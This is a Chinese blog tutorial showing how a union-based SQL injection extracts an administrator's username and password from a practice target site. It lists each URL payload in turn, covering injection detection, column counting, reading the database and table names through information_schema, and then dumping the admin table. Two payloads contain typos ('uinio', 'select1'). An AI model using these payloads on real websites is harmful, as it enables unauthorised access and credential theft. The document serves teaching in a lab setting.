【安全】【SQL注入漏洞】通过sql注入获取数据库管理员密码

本博客中使用封神台靶标系统进行演示,靶标系统网站

一、判断网站是否存在sql注入漏洞

1.在地址栏写入?id=1 and 1=1,回车
在这里插入图片描述
页面返回正常。
2.在地址栏写入?id=1 and 1=2,回车
在这里插入图片描述
页面返回异常,这里可能存在sql注入漏洞。

二、判断字段数

1.在地址栏写入?id=1 and 1=1 order by 3
在这里插入图片描述
页面返回异常,表的字段数小于3
2.在地址栏写入?id=1 and 1=1 order by 2
在这里插入图片描述
页面返回正常,说明表的字段数为2。

三、获取回显点

在地址栏写入?id=1 union select1,2
在这里插入图片描述
页面出现了2,说明我们可以在数字2出显示我们想要的内容。

四、显示想要的内容

1.查询当前数据库名
构造?id=1 and 1=2 uinio select 1,database(),并回车。
在这里插入图片描述
获取数据库名称为“maoshe”。
2.查询当前数据库表名
构造?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车。
在这里插入图片描述
绝大数情况下,管理员的账号密码都在admin表里。
3.在这里插入图片描述
4.查询字段名
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1 回车
在这里插入图片描述
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 1,1 回车。
在这里插入图片描述
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 2,1 回车。
在这里插入图片描述
查出 admin 表里 有 id username password 三个字段。
4.查询字段内容
构造 ?id=1 and 1=2 union select 1,username from admin limit 0,1 回车。
在这里插入图片描述
5.获取用户密码
构造 ?id=1 and 1=2 union select 1,password from admin limit 0,1 回车。
在这里插入图片描述
最终获取管理员账号和密码。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值